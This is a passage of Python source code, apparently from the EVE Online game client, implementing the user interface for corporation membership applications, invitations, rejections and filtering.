myFilter = self.quickFilter.GetValue().strip()\n if myFilter == '':\n self.filteringBy = myFilter\n settings.char.ui.Set(self.quickFilterSetting, self.filteringBy)\n applications = self.GetApplications()\n scrolllist = self.GetCorpApplicationEntries(applications)\n self.RefreshApplicationScroll(addNodes=scrolllist, forceClear=True)\n\n def SearchByCharacterName(self, *args):\n myFilter = self.quickFilter.GetValue().strip()\n if len(myFilter) == 0:\n return\n self.filteringBy = myFilter\n applications = self.GetApplications()\n scrolllist = self.GetCorpApplicationEntries(applications)\n self.RefreshApplicationScroll(addNodes=scrolllist, forceClear=True)\n\n def StatusFilterMenu(self, menuParent):\n for applicationStatusID in APPLICATION_STATUS_LABELNAMES:\n if applicationStatusID == const.crpApplicationRejectedByCharacter:\n continue\n isChecked = _LoadApplicationFilterSetting(applicationStatusID, False)\n menuParent.AddCheckBox(_GetApplicationStatusLabel(applicationStatusID), checked=isChecked, callback=(self.ToggleStatusFilter, applicationStatusID, isChecked))\n\n menuParent.AddDivider()\n menuParent.AddCheckBox(localization.GetByLabel('UI/Corporations/CorpApplications/ShowOldApplications'), checked=self.showingOld, callback=(self.SetShowOld, not self.showingOld))\n\n def SetShowOld(self, value):\n settings.char.ui.Set('applicationsShowOld_%s' % self.ownerID, value)\n self.showingOld = value\n applications = self.GetApplications()\n scrolllist = self.GetCorpApplicationEntries(applications)\n self.RefreshApplicationScroll(addNodes=scrolllist, forceClear=True)\n\n def ToggleStatusFilter(self, applicationStatusID, isChecked):\n viewingStatus = []\n if isChecked:\n removeNodes = []\n _SaveApplicationFilterSetting(applicationStatusID, False)\n for status in self.sr.viewingStatus:\n if status != applicationStatusID:\n viewingStatus.append(status)\n\n for applicationNode in self.applicationScroll.GetNodes():\n if applicationNode.application.status not in viewingStatus:\n removeNodes.append(applicationNode)\n\n self.RefreshApplicationScroll(removeNodes=removeNodes)\n else:\n _SaveApplicationFilterSetting(applicationStatusID, True)\n viewingStatus.append(applicationStatusID)\n viewingStatus.extend(self.sr.viewingStatus)\n applications = self.GetApplications([applicationStatusID])\n scrolllist = self.GetCorpApplicationEntries(applications)\n if len(scrolllist) > 0:\n self.RefreshApplicationScroll(addNodes=scrolllist)\n self.sr.viewingStatus = viewingStatus\n\n def InitViewingStatus(self):\n viewingStatus = []\n for applicationStatusID in APPLICATION_STATUS_LABELNAMES:\n if self.ownerID == session.charid:\n viewingStatus.append(applicationStatusID)\n elif _LoadApplicationFilterSetting(applicationStatusID, False):\n viewingStatus.append(applicationStatusID)\n\n if len(viewingStatus) == 0:\n viewingStatus = [const.crpApplicationAppliedByCharacter]\n _SaveApplicationFilterSetting(const.crpApplicationAppliedByCharacter, True)\n self.sr.viewingStatus = viewingStatus\n\n def LoadApplications(self):\n if self.destroyed:\n return\n try:\n try:\n myFilter = self.quickFilter.GetValue()\n if len(myFilter):\n self.filteringBy = myFilter\n sm.GetService('corpui').ShowLoad()\n applications = self.GetApplications()\n scrolllist = self.GetCorpApplicationEntries(applications)\n if len(scrolllist) > 0:\n self.HideNoContentHint()\n self.RefreshApplicationScroll(addNodes=scrolllist)\n else:\n self.ShowNoContentHint()\n except:\n pass\n\n finally:\n sm.GetService('corpui').HideLoad()\n\n def RefreshApplicationScroll(self, addNodes=[], removeNodes=[], reloadNodes=[], forceClear=False):\n if forceClear:\n self.applicationScroll.Clear()\n elif len(removeNodes):\n self.applicationScroll.RemoveNodes(removeNodes, updateScroll=True)\n if len(reloadNodes):\n self.applicationScroll.ReloadNodes(reloadNodes)\n if len(addNodes):\n self.applicationScroll.AddNodes(0, addNodes, updateScroll=True)\n toSort = self.applicationScroll.GetNodes()\n if toSort:\n self.HideNoContentHint()\n sortedNodes = sorted(toSort, key=lambda x: x.application.applicationDateTime, reverse=True)\n self.applicationScroll.SetOrderedNodes(sortedNodes)\n else:\n self.ShowNoContentHint()\n\n def ShowNoContentHint(self):\n self.applicationScroll.ShowHint(localization.GetByLabel('UI/Corporations/CorpApplications/NoApplicationsFound'))\n\n def HideNoContentHint(self):\n self.applicationScroll.ShowHint('')\n\n def OnCorporationApplicationChanged(self, corpID, applicantID, applicationID, newApplication):\n if self.destroyed:\n return\n for applicationNode in self.applicationScroll.GetNodes():\n if applicationNode.application.applicationID == applicationID:\n applicationNode.application = newApplication\n if newApplication.status in self.sr.viewingStatus:\n self.RefreshApplicationScroll(reloadNodes=[applicationNode])\n else:\n self.RefreshApplicationScroll(removeNodes=[applicationNode])\n break\n else:\n if newApplication.status in self.sr.viewingStatus:\n scrolllist = self.GetCorpApplicationEntries([newApplication])\n self.RefreshApplicationScroll(addNodes=scrolllist)\n\n\nclass ViewCorpApplicationWnd(uicontrols.Window):\n __guid__ = 'form.ViewCorpApplicationWnd'\n default_width = 400\n default_height = 255\n default_minSize = (default_width, default_height)\n\n def ApplyAttributes(self, attributes):\n uicontrols.Window.ApplyAttributes(self, attributes)\n self.DefineButtons(uiconst.OKCANCEL, okFunc=self.Confirm, cancelFunc=self.Cancel)\n self.charID = attributes.get('characterID')\n self.appText = attributes.get('applicationText')\n self.status = attributes.get('status')\n wndCaption = localization.GetByLabel('UI/Corporations/CorpApplications/ViewApplicationDetailCaption')\n self.SetCaption(wndCaption)\n self.SetTopparentHeight(0)\n self.MakeUnResizeable()\n self.ConstructLayout()\n\n def ConstructLayout(self):\n charInfoCont = uiprimitives.Container(name='charInfo', parent=self.sr.main, align=uiconst.TOTOP, height=68, padding=const.defaultPadding)\n charLogoCont = uiprimitives.Container(name='charLogo', parent=charInfoCont, align=uiconst.TOLEFT, width=68)\n charTextCont = uiprimitives.Container(name='charName', parent=charInfoCont, align=uiconst.TOALL)\n applicationCont = uiprimitives.Container(name='charInfo', parent=self.sr.main, align=uiconst.TOALL, padding=(const.defaultPadding, 0, const.defaultPadding, const.defaultPadding))\n uiutil.GetOwnerLogo(charLogoCont, self.charID, size=64, noServerCall=True)\n charText = localization.GetByLabel('UI/Corporations/CorpApplications/ApplicationSubjectLine', player=self.charID)\n charNameLabel = uicontrols.EveLabelLarge(parent=charTextCont, text=charText, top=12, align=uiconst.TOPLEFT, width=270)\n editText = localization.GetByLabel('UI/Corporations/BaseCorporationUI/CorporationApplicationText')\n editLabel = uicontrols.EveLabelSmall(parent=applicationCont, text=editText, align=uiconst.TOTOP)\n self.rejectRb = uicontrols.Checkbox(text=localization.GetByLabel('UI/Corporations/CorpApplications/RejectApplication'), parent=applicationCont, configName='reject', retval=1, checked=False, groupname='state', align=uiconst.TOBOTTOM)\n self.acceptRb = uicontrols.Checkbox(text=localization.GetByLabel('UI/Corporations/CorpApplications/ApplicationInviteApplicant'), parent=applicationCont, configName='accept', retval=0, checked=True, groupname='state', align=uiconst.TOBOTTOM)\n if self.status not in const.crpApplicationActiveStatuses:\n self.rejectRb.state = uiconst.UI_HIDDEN\n self.acceptRb.state = uiconst.UI_HIDDEN\n self.applicationText = uicls.EditPlainText(setvalue=self.appText, parent=applicationCont, maxLength=1000, readonly=True)\n\n def Confirm(self, *args):\n if self.status not in const.crpApplicationActiveStatuses:\n self.Cancel()\n applicationText = self.applicationText.GetValue()\n if len(applicationText) > 1000:\n error = localization.GetByLabel('UI/Corporations/CorpApplications/ApplicationTextTooLong', length=len(applicationText))\n eve.Message('CustomInfo', {'info': error})\n else:\n if self.rejectRb.checked:\n rejected = const.crpApplicationRejectedByCorporation\n else:\n rejected = const.crpApplicationAcceptedByCorporation\n self.result = rejected\n self.SetModalResult(1)\n\n def Cancel(self, *args):\n self.result = None\n self.SetModalResult(0)\n return\n\n\nclass MyCorpApplicationWnd(uicontrols.Window):\n __guid__ = 'form.MyCorpApplicationWnd'\n default_width = 400\n default_height = 300\n default_minSize = (default_width, default_height)\n\n def ApplyAttributes(self, attributes):\n uicontrols.Window.ApplyAttributes(self, attributes)\n self.corpid = attributes.get('corpid')\n self.application = attributes.get('application')\n self.status = attributes.get('status')\n self.windowID = 'viewApplicationWindow'\n if self.status in const.crpApplicationActiveStatuses:\n self.DefineButtons(uiconst.OKCANCEL, okFunc=self.Confirm, cancelFunc=self.Cancel)\n else:\n self.DefineButtons(uiconst.OK, okFunc=self.Cancel)\n wndCaption = localization.GetByLabel('UI/Corporations/CorpApplications/ViewApplicationDetailCaption')\n self.SetCaption(wndCaption)\n self.SetTopparentHeight(0)\n self.MakeUnResizeable()\n self.ConstructLayout()\n\n def ConstructLayout(self):\n self.acceptRb = None\n self.withdrawRb = None\n corpName = cfg.eveowners.Get(self.corpid).name\n corpInfoCont = uiprimitives.Container(name='corpInfo', parent=self.sr.main, align=uiconst.TOTOP, height=68, padding=const.defaultPadding)\n corpLogoCont = uiprimitives.Container(name='corpLogo', parent=corpInfoCont, align=uiconst.TOLEFT, width=68)\n corpTextCont = uiprimitives.Container(name='corpName', parent=corpInfoCont, align=uiconst.TOALL)\n controlCont = uiprimitives.Container(name='buttons', parent=self.sr.main, align=uiconst.TOBOTTOM, padding=(const.defaultPadding, 0, const.defaultPadding, const.defaultPadding))\n controlContHeight = 0\n applicationCont = uiprimitives.Container(name='applicationCont', parent=self.sr.main, align=uiconst.TOALL, padding=(const.defaultPadding, 0, const.defaultPadding, const.defaultPadding))\n uiutil.GetOwnerLogo(corpLogoCont, self.corpid, size=64, noServerCall=True)\n corpText = localization.GetByLabel('UI/Corporations/CorpApplications/YourApplicationToJoin', corpName=corpName)\n corpNameLabel = uicontrols.EveLabelLarge(parent=corpTextCont, text=corpText, top=12, align=uiconst.TOPLEFT, width=270)\n if self.status == const.crpApplicationAppliedByCharacter:\n statusText = localization.GetByLabel('UI/Corporations/CorpApplications/ApplicationNotProcessed')\n statusLabel = uicontrols.EveLabelSmall(parent=applicationCont, text=statusText, align=uiconst.TOTOP, padBottom=const.defaultPadding)\n else:\n statusText = statusLabel = ''\n editText = localization.GetByLabel('UI/Corporations/BaseCorporationUI/CorporationApplicationText')\n editLabel = uicontrols.EveLabelSmall(parent=applicationCont, text=editText, align=uiconst.TOTOP)\n if self.application.applicationText is not None:\n appText = self.application.applicationText\n else:\n appText = ''\n self.applicationText = uicls.EditPlainText(setvalue=appText, parent=applicationCont, maxLength=1000, readonly=True)\n if self.status in const.crpApplicationActiveStatuses:\n isWithdrawChecked = True\n if self.status in (const.crpApplicationAcceptedByCorporation, const.crpApplicationInvitedByCorporation):\n isWithdrawChecked = False\n self.acceptRb = uicontrols.Checkbox(text=localization.GetByLabel('UI/Corporations/CorpApplications/AcceptApplication'), parent=controlCont, configName='accept', retval=1, checked=True, groupname='stateGroup', align=uiconst.TOBOTTOM)\n controlContHeight += 40\n self.withdrawRb = uicontrols.Checkbox(text=localization.GetByLabel('UI/Corporations/CorpApplications/WithdrawApplication'), parent=controlCont, configName='accept', retval=3, checked=isWithdrawChecked, groupname='stateGroup', align=uiconst.TOBOTTOM)\n controlContHeight += 20\n controlCont.height = controlContHeight\n return\n\n def Confirm(self, *args):\n self.result = None\n if self.withdrawRb.checked:\n self.result = const.crpApplicationWithdrawnByCharacter\n elif self.acceptRb.checked:\n self.result = const.crpApplicationAcceptedByCharacter\n self.SetModalResult(1)\n return\n\n def Cancel(self, *args):\n self.result = None\n self.SetModalResult(0)\n return\n\n def WithdrawApplication(self, *args):\n try:\n sm.GetService('corpui').ShowLoad()\n application = self.application\n sm.GetService('corpui').ShowLoad()\n sm.GetService('corp').UpdateApplicationOffer(application.applicationID, application.characterID, application.corporationID, application.applicationText, const.crpApplicationWithdrawnByCharacter)\n finally:\n sm.GetService('corpui').HideLoad()\n uicontrols.Window.CloseIfOpen(windowID='viewApplicationWindow')\n\n\nclass ApplyToCorpWnd(uicontrols.Window):\n __guid__ = 'form.ApplyToCorpWnd'\n default_width = 400\n default_height = 245\n default_minSize = (default_width, default_height)\n\n def ApplyAttributes(self, attributes):\n uicontrols.Window.ApplyAttributes(self, attributes)\n self.DefineButtons(uiconst.OKCANCEL, okFunc=self.Confirm, cancelFunc=self.Cancel)\n self.corpid = attributes.get('corpid')\n self.corporation = attributes.get('corporation')\n wndCaption = localization.GetByLabel('UI/Corporations/BaseCorporationUI/JoinCorporation')\n self.SetCaption(wndCaption)\n self.SetTopparentHeight(0)\n self.MakeUnResizeable()\n self.ConstructLayout()\n\n def ConstructLayout(self):\n corpName = cfg.eveowners.Get(self.corpid).name\n corpInfoCont = uiprimitives.Container(name='corpInfo', parent=self.sr.main, align=uiconst.TOTOP, height=68, padding=const.defaultPadding)\n corpLogoCont = uiprimitives.Container(name='corpLogo', parent=corpInfoCont, align=uiconst.TOLEFT, width=68)\n corpTextCont = uiprimitives.Container(name='corpName', parent=corpInfoCont, align=uiconst.TOALL)\n applicationCont = uiprimitives.Container(name='corpInfo', parent=self.sr.main, align=uiconst.TOALL, padding=(const.defaultPadding, 0, const.defaultPadding, const.defaultPadding))\n uiutil.GetOwnerLogo(corpLogoCont, self.corpid, size=64, noServerCall=True)\n corpText = localization.GetByLabel('UI/Corporations/BaseCorporationUI/ApplyForMembership', corporation=corpName)\n corpNameLabel = uicontrols.EveLabelLarge(parent=corpTextCont, text=corpText, top=12, align=uiconst.TOPLEFT, width=270)\n editText = localization.GetByLabel('UI/Corporations/BaseCorporationUI/CorporationApplicationText')\n editLabel = uicontrols.EveLabelSmall(parent=applicationCont, text=editText, align=uiconst.TOTOP)\n tax = self.corporation.taxRate * 100\n taxText = localization.GetByLabel('UI/Corporations/BaseCorporationUI/CurrentTaxRateForCorporation', corporation=corpName, taxRate=tax)\n taxLabel = uicontrols.EveLabelSmall(parent=applicationCont, text=taxText, align=uiconst.TOBOTTOM)\n corpService = sm.GetService('corp')\n aggressionSettings = corpService.GetAggressionSettings(self.corpid)\n statusText = corpService.GetCorpFriendlyFireStatus(aggressionSettings)\n ffText = localization.GetByLabel('UI/Corporations/FriendlyFire/FriendlyFireStatus', ffStatus=statusText)\n ffCont = uiprimitives.Container(parent=applicationCont, align=uiconst.TOBOTTOM, height=16)\n friendlyFireLabel = uicontrols.EveLabelSmall(parent=ffCont, text=ffText, align=uiconst.TOLEFT)\n helpIcon = MoreInfoIcon(parent=ffCont, align=uiconst.TORIGHT, hint=localization.GetByLabel('UI/Corporations/FriendlyFire/Description'))\n if self.corporation and not self.corporation.isRecruiting:\n notRecruitingText = localization.GetByLabel('UI/Corporations/BaseCorporationUI/RecruitmentMayBeClosed')\n notRecruiting = uicontrols.EveLabelSmall(parent=applicationCont, text=notRecruitingText, align=uiconst.TOBOTTOM, idx=0)\n self.SetMinSize((self.default_width, self.default_height + notRecruiting.textheight), refresh=True)\n self.applicationText = uicls.EditPlainText(setvalue='', parent=applicationCont, align=uiconst.TOALL, maxLength=1000)\n\n def Confirm(self, *args):\n applicationText = self.applicationText.GetValue()\n if len(applicationText) > const.crpApplicationMaxSize:\n error = localization.GetByLabel('UI/Corporations/BaseCorporationUI/ApplicationTextTooLong', length=len(applicationText))\n eve.Message('CustomInfo', {'info': error})\n else:\n self.result = applicationText\n self.SetModalResult(1)\n\n def Cancel(self, *args):\n self.result = None\n self.SetModalResult(0)\n return\n\n\ndef get_display_text_for_application(application):\n if application.status == const.crpApplicationRejectedByCorporation:\n display_text = application.responseText or ''\n else:\n display_text = application.applicationText\n return display_text.strip()\n\n\nclass CorpApplicationEntry(SE_BaseClassCore):\n __guid__ = 'listentry.CorpApplicationEntry'\n __notifyevents__ = []\n LOGOPADDING = 70\n TEXTPADDING = 18\n CORPNAMEPAD = (LOGOPADDING, 0, 0, 0)\n EXTENDEDPAD = (\n LOGOPADDING, const.defaultPadding, const.defaultPadding, const.defaultPadding)\n CORPNAMECLASS = uicontrols.EveLabelLarge\n EXTENDEDCLASS = uicontrols.EveLabelMedium\n APPHEADERHEIGHT = 53\n\n def PreLoad(node):\n application = node.application\n\n def Startup(self, *args):\n node = self.sr.node\n self.corpSvc = sm.GetService('corp')\n self.lscSvc = sm.GetService('LSC')\n self.viewButton = None\n self.removeButton = None\n self.rejectButton = None\n self.acceptButton = None\n self.ownerID = None\n if node.myView:\n self.ownerID = node.application.corporationID\n else:\n self.ownerID = node.application.characterID\n self.entryContainer = uiprimitives.Container(parent=self)\n self.headerContainer = uiprimitives.Container(parent=self.entryContainer, align=uiconst.TOTOP, name='applicationHeaderContainer', height=self.APPHEADERHEIGHT)\n self.expander = uiprimitives.Sprite(parent=self.headerContainer, state=uiconst.UI_DISABLED, name='expander', pos=(0,\n 0,\n 16,\n 16), texturePath='res:/UI/Texture/Shared/getMenuIcon.png', align=uiconst.CENTERLEFT)\n if node.isExpanded:\n self.expander.rotation = -pi * 0.5\n logoParent = uiprimitives.Container(parent=self.headerContainer, align=uiconst.TOPLEFT, pos=(16,\n 2,\n 48,\n 48))\n uiutil.GetOwnerLogo(logoParent, self.ownerID, size=48, noServerCall=True)\n logoParent.children[0].OnMouseEnter = self.OnMouseEnter\n logoParent.children[0].OnClick = self.ShowOwnerInfo\n self.nameLabel = self.CORPNAMECLASS(parent=self.headerContainer, name='nameLabel', state=uiconst.UI_DISABLED, align=uiconst.CENTERLEFT, padding=self.CORPNAMEPAD)\n self.expandedParent = uiprimitives.Container(parent=self.entryContainer, name='expandedParent', height=0)\n label_text = get_display_text_for_application(node.application)\n self.expandedLabel = self.EXTENDEDCLASS(parent=self.expandedParent, name='applicationText', text=label_text, padding=self.EXTENDEDPAD, align=uiconst.TOALL)\n self.hilite = uiprimitives.Fill(bgParent=self.headerContainer, color=(1, 1,\n 1,\n 0))\n uiprimitives.Fill(bgParent=self.expandedParent, color=(0, 0, 0, 0.2))\n return\n\n def Load(self, node):\n ownerName = cfg.eveowners.Get(self.ownerID).ownerName\n applicationDate = localization.GetByLabel('UI/Corporations/Applications/ApplicationDate', applicationDateTime=node.application.applicationDateTime)\n statusText = '%s' % _GetApplicationStatusLabel(node.application.status)\n nameStatusAndDate = '%s - %s
%s' % (ownerName, statusText, applicationDate)\n self.nameLabel.text = nameStatusAndDate\n addPadding = const.defaultPadding\n if node.myView:\n if node.application.status not in const.crpApplicationEndStatuses:\n if self.removeButton is not None and not self.removeButton.destroyed:\n self.removeButton.left = addPadding\n else:\n if node.application.status == const.crpApplicationInvitedByCorporation:\n label = localization.GetByLabel('UI/Corporations/CorpApplications/DeclineInvitation')\n rejectFunc = self.RejectCorpInvitation\n else:\n label = (localization.GetByLabel('UI/Corporations/CorpApplications/WithdrawApplication'),)\n rejectFunc = self.WithdrawMyApplication\n self.removeButton = uicontrols.Button(name='removeButton', parent=self.headerContainer, label=label, align=uiconst.CENTERRIGHT, left=addPadding, func=rejectFunc)\n addPadding += self.removeButton.width + const.defaultPadding\n elif self.removeButton is not None:\n self.removeButton.Close()\n self.removeButton = None\n if node.myView and node.application.status in (\n const.crpApplicationAcceptedByCorporation, const.crpApplicationInvitedByCorporation):\n if self.acceptButton is not None and not self.acceptButton.destroyed:\n self.acceptButton.left = addPadding\n else:\n self.acceptButton = uicontrols.Button(name='acceptButton', parent=self.headerContainer, label=localization.GetByLabel('UI/Corporations/CorpApplications/AcceptApplication'), align=uiconst.CENTERRIGHT, left=addPadding, func=self.AcceptInvitation)\n elif self.acceptButton is not None:\n self.acceptButton.Close()\n self.acceptButton = None\n else:\n if node.application.status == const.crpApplicationAppliedByCharacter:\n if self.acceptButton is not None and not self.acceptButton.destroyed:\n self.acceptButton.left = addPadding\n else:\n self.acceptButton = uicontrols.Button(name='acceptButton', parent=self.headerContainer, label=localization.GetByLabel('UI/Corporations/CorpApplications/ApplicationInviteApplicant'), align=uiconst.CENTERRIGHT, left=addPadding, func=self.AcceptCorpApplication)\n addPadding += self.acceptButton.width + const.defaultPadding\n elif self.acceptButton is not None:\n self.acceptButton.Close()\n self.acceptButton = None\n if node.application.status not in const.crpApplicationEndStatuses:\n if self.rejectButton is not None and not self.rejectButton.destroyed:\n self.rejectButton.left = addPadding\n else:\n self.rejectButton = uicontrols.Button(name='rejectButton', parent=self.headerContainer, label=localization.GetByLabel('UI/Corporations/CorpApplications/RejectApplication'), align=uiconst.CENTERRIGHT, left=addPadding, func=self.RejectCorpApplication)\n elif self.rejectButton is not None:\n self.rejectButton.Close()\n self.rejectButton = None\n if node.fadeSize is not None:\n toHeight, fromHeight = node.fadeSize\n self.expandedParent.opacity = 0.0\n uicore.animations.MorphScalar(self, 'height', startVal=fromHeight, endVal=toHeight, duration=0.3)\n uicore.animations.FadeIn(self.expandedParent, duration=0.3)\n node.fadeSize = None\n if node.isExpanded:\n self.expandedParent.display = True\n rotValue = -pi * 0.5\n else:\n rotValue = 0.0\n self.expandedParent.display = False\n uicore.animations.MorphScalar(self.expander, 'rotation', self.expander.rotation, rotValue, duration=0.15)\n self.expandedLabel.text = get_display_text_for_application(node.application)\n return\n\n def OnClick(self):\n node = self.sr.node\n reloadNodes = [node]\n if node.isExpanded:\n uicore.animations.Tr2DRotateTo(self.expander, -pi * 0.5, 0.0, duration=0.15)\n node.isExpanded = False\n allNodes = settings.char.ui.Get('corporation_applications_expanded', {})\n allNodes[node.myView] = None\n settings.char.ui.Set('corporation_applications_expanded', allNodes)\n else:\n for otherNode in node.scroll.sr.nodes:\n if otherNode.isExpanded and otherNode != node:\n otherNode.isExpanded = False\n reloadNodes.append(otherNode)\n\n uicore.animations.Tr2DRotateTo(self.expander, 0.0, -pi * 0.5, duration=0.15)\n node.isExpanded = True\n node.fadeSize = (\n CorpApplicationEntry.GetDynamicHeight(node, self.width), self.height)\n allNodes = settings.char.ui.Get('corporation_applications_expanded', {})\n allNodes[node.myView] = node.application.applicationID\n settings.char.ui.Set('corporation_applications_expanded', allNodes)\n self.sr.node.scroll.ReloadNodes(reloadNodes, updateHeight=True)\n return\n\n def GetMenu(self):\n node = self.sr.node\n menu = [(uiutil.MenuLabel('UI/Commands/ShowInfo'), self.ShowOwnerInfo)]\n if node.myView:\n if node.application.status not in const.crpApplicationEndStatuses:\n if node.application.status == const.crpApplicationInvitedByCorporation:\n label = uiutil.MenuLabel('UI/Corporations/CorpApplications/DeclineInvitation')\n else:\n label = uiutil.MenuLabel('UI/Corporations/CorpApplications/WithdrawApplication')\n menu.append((label, self.WithdrawMyApplication))\n if node.application.status in (const.crpApplicationAcceptedByCorporation,\n const.crpApplicationInvitedByCorporation):\n menu.append((uiutil.MenuLabel('UI/Corporations/CorpApplications/AcceptApplication'), self.AcceptInvitation))\n elif const.corpRolePersonnelManager & session.corprole == const.corpRolePersonnelManager:\n if node.application.status == const.crpApplicationAppliedByCharacter:\n menu.append((\n uiutil.MenuLabel('UI/Corporations/CorpApplications/ApplicationInviteApplicant'), self.AcceptCorpApplication))\n if node.application.status not in const.crpApplicationEndStatuses:\n menu.append((uiutil.MenuLabel('UI/Corporations/CorpApplications/RejectApplication'), self.RejectCorpApplication))\n return menu\n\n def GetDynamicHeight(node, width):\n text = get_display_text_for_application(node.application)\n entryClass = CorpApplicationEntry\n if node.isExpanded:\n lp, tp, rp, bp = entryClass.EXTENDEDPAD\n textWidth, textHeight = entryClass.EXTENDEDCLASS.MeasureTextSize(text, width=width - (lp + rp))\n textHeight = textHeight + entryClass.APPHEADERHEIGHT + tp + bp\n return textHeight\n else:\n return entryClass.APPHEADERHEIGHT\n\n def ShowOwnerInfo(self):\n owner = cfg.eveowners.Get(self.ownerID)\n sm.GetService('info').ShowInfo(owner.typeID, owner.ownerID)\n\n def OnMouseEnter(self, *args):\n uicore.animations.FadeIn(self.hilite, 0.05, duration=0.1)\n self.hiliteTimer = base.AutoTimer(1, self._CheckIfStillHilited)\n\n def _CheckIfStillHilited(self):\n if uiutil.IsUnder(uicore.uilib.mouseOver, self) or uicore.uilib.mouseOver is self:\n return\n else:\n uicore.animations.FadeOut(self.hilite, duration=0.3)\n self.hiliteTimer = None\n return\n\n def _UpdateCurrentApplicationWithStatus(self, newStatus):\n try:\n sm.GetService('corpui').ShowLoad()\n application = self.sr.node.application\n sm.GetService('corp').UpdateApplicationOffer(application.applicationID, application.characterID, application.corporationID, application.applicationText, newStatus)\n finally:\n sm.GetService('corpui').HideLoad()\n uicontrols.Window.CloseIfOpen(windowID='viewApplicationWindow')\n\n def AcceptInvitation(self, *args):\n self._UpdateCurrentApplicationWithStatus(const.crpApplicationAcceptedByCharacter)\n\n def WithdrawMyApplication(self, *args):\n self._UpdateCurrentApplicationWithStatus(const.crpApplicationWithdrawnByCharacter)\n\n def RejectCorpInvitation(self, *args):\n self._UpdateCurrentApplicationWithStatus(const.crpApplicationRejectedByCharacter)\n\n def AcceptCorpApplication(self, *args):\n self._UpdateCurrentApplicationWithStatus(const.crpApplicationAcceptedByCorporation)\n\n def RejectCorpApplication(self, *args):\n RejectCorpApplicationWnd.CloseIfOpen(windowID='rejectCorpApplication')\n application = self.sr.node.application\n RejectCorpApplicationWnd.Open(application=application)\n\n\ndef _GetApplicationStatusLabel(applicationStatusID):\n return localization.GetByLabel(APPLICATION_STATUS_LABELNAMES[applicationStatusID])\n\n\ndef _LoadApplicationFilterSetting(applicationStatusID, default):\n return settings.char.ui.Get(_GetSettingsKeyName(applicationStatusID), default)\n\n\ndef _SaveApplicationFilterSetting(applicationStatusID, value):\n settings.char.ui.Set(_GetSettingsKeyName(applicationStatusID), value)\n\n\ndef _GetSettingsKeyName(applicationStatusID):\n return STATUS_SETTING_NAME % applicationStatusID\n\n\nclass RejectCorpApplicationWnd(uicontrols.Window):\n __guid__ = 'form.RejectCorpApplicationWnd'\n default_width = 400\n default_height = 280\n default_minSize = (default_width, default_height)\n\n def ApplyAttributes(self, attributes):\n uicontrols.Window.ApplyAttributes(self, attributes)\n self.application = attributes.application\n self.windowID = 'rejectCorpApplication'\n self.DefineButtons(uiconst.OKCANCEL, okFunc=self.Reject, cancelFunc=self.Cancel, okLabel=localization.GetByLabel('UI/Corporations/CorpApplications/RejectApplication'))\n wndCaption = localization.GetByLabel('UI/Corporations/Applications/ApplicationRejection')\n self.SetCaption(wndCaption)\n self.SetTopparentHeight(0)\n self.MakeUnResizeable()\n topCont = Container(parent=self.sr.main, align=uiconst.TOTOP, height=58)\n textCont = Container(parent=self.sr.main, align=uiconst.TOALL, padding=8)\n charName = cfg.eveowners.Get(self.application.characterID).name\n corpName = cfg.eveowners.Get(self.application.corporationID).name\n logoParent = uiprimitives.Container(parent=topCont, align=uiconst.TOPLEFT, pos=(8,\n 6,\n 48,\n 48))\n uiutil.GetOwnerLogo(logoParent, self.application.characterID, size=48, noServerCall=True)\n characterLink = localization.GetByLabel('UI/Contracts/ContractsWindow/ShowInfoLink', showInfoName=charName, info=('showinfo', const.typeCharacterAmarr, self.application.characterID))\n nameLabel = EveLabelMedium(parent=topCont, left=64, top=12, text=characterLink, align=uiconst.TOTOP, state=uiconst.UI_NORMAL)\n applicationDate = localization.GetByLabel('UI/Corporations/Applications/ApplicationDate', applicationDateTime=self.application.applicationDateTime)\n dateLabel = EveLabelMedium(parent=topCont, left=64, top=2, text=applicationDate, align=uiconst.TOTOP, state=uiconst.UI_NORMAL)\n messageLabel = EveLabelMedium(parent=textCont, align=uiconst.TOTOP, text=localization.GetByLabel('UI/Corporations/CorpApplications/ApplicationRejectionText', charName=charName, corpName=corpName))\n regardsLabel = EveLabelMedium(parent=textCont, align=uiconst.TOBOTTOM, text=localization.GetByLabel('UI/Corporations/CorpApplications/ApplicationRejectionRegards', corpName=corpName), padTop=4)\n self.messageTextEdit = uicls.EditPlainText(parent=textCont, maxLength=1000, hintText=localization.GetByLabel('UI/Corporations/CorpApplications/CorpRejectionMessage'), top=4)\n\n def Reject(self, *args):\n try:\n sm.GetService('corpui').ShowLoad()\n customMessage = self.messageTextEdit.GetValue()\n sm.GetService('corp').UpdateApplicationOffer(self.application.applicationID, self.application.characterID, self.application.corporationID, self.application.applicationText, const.crpApplicationRejectedByCorporation, customMessage=customMessage)\n finally:\n sm.GetService('corpui').HideLoad()\n uicontrols.Window.CloseIfOpen(windowID='viewApplicationWindow')\n self.Close()\n\n def Cancel(self, *args):\n self.Close()\n\n\nclass InviteToCorpWnd(uicontrols.Window):\n __guid__ = 'form.InviteToCorpWnd'\n default_width = 320\n default_height = 300\n default_windowID = 'InviteToCorpWnd'\n default_iconNum = 'res:/ui/Texture/WindowIcons/corporation.png'\n\n def ApplyAttributes(self, attributes):\n uicontrols.Window.ApplyAttributes(self, attributes)\n self.searchStr = ''\n self.scope = 'all'\n self.SetMinSize([320, 300])\n self.SetWndIcon(self.iconNum)\n self.scroll = uicontrols.Scroll(parent=self.sr.main, padding=(const.defaultPadding, const.defaultPadding, const.defaultPadding, const.defaultPadding))\n self.scroll.Startup()\n self.scroll.multiSelect = 0\n self.standardBtns = uicontrols.ButtonGroup(btns=[\n [\n localization.GetByLabel('UI/Ship/ShipConfig/Invite'),\n self.InviteToCorp, (), 81], [localization.GetByLabel('UI/Common/Buttons/Cancel'), self.OnCancel, (), 81]])\n self.inviteButton = self.standardBtns.GetBtnByIdx(0)\n self.inviteButton.Disable()\n self.sr.main.children.insert(0, self.standardBtns)\n self.SetCaption(localization.GetByLabel('UI/Messages/SelectCharacterTitle'))\n self.label = uicontrols.EveLabelSmall(text=localization.GetByLabel('UI/Shared/TypeSearchString'), parent=self.sr.topParent, left=70, top=16, state=uiconst.UI_NORMAL)\n self.nameInput = uicontrols.SinglelineEdit(name='edit', parent=self.sr.topParent, pos=(70, self.label.top + self.label.height + 2, 86, 0), align=uiconst.TOPLEFT, maxLength=32)\n self.nameInput.OnReturn = self.Search\n btn = uicontrols.Button(parent=self.sr.topParent, label=localization.GetByLabel('UI/Wallet/WalletWindow/WalletSearch'), pos=(self.nameInput.left + self.nameInput.width + 2, self.nameInput.top, 0, 0), func=self.Search, btn_default=1)\n self.SetHint(localization.GetByLabel('UI/Common/TypeInSearch'))\n\n def Search(self, *args):\n scrolllist = []\n self.inviteButton.Disable()\n self.ShowLoad()\n try:\n self.searchStr = 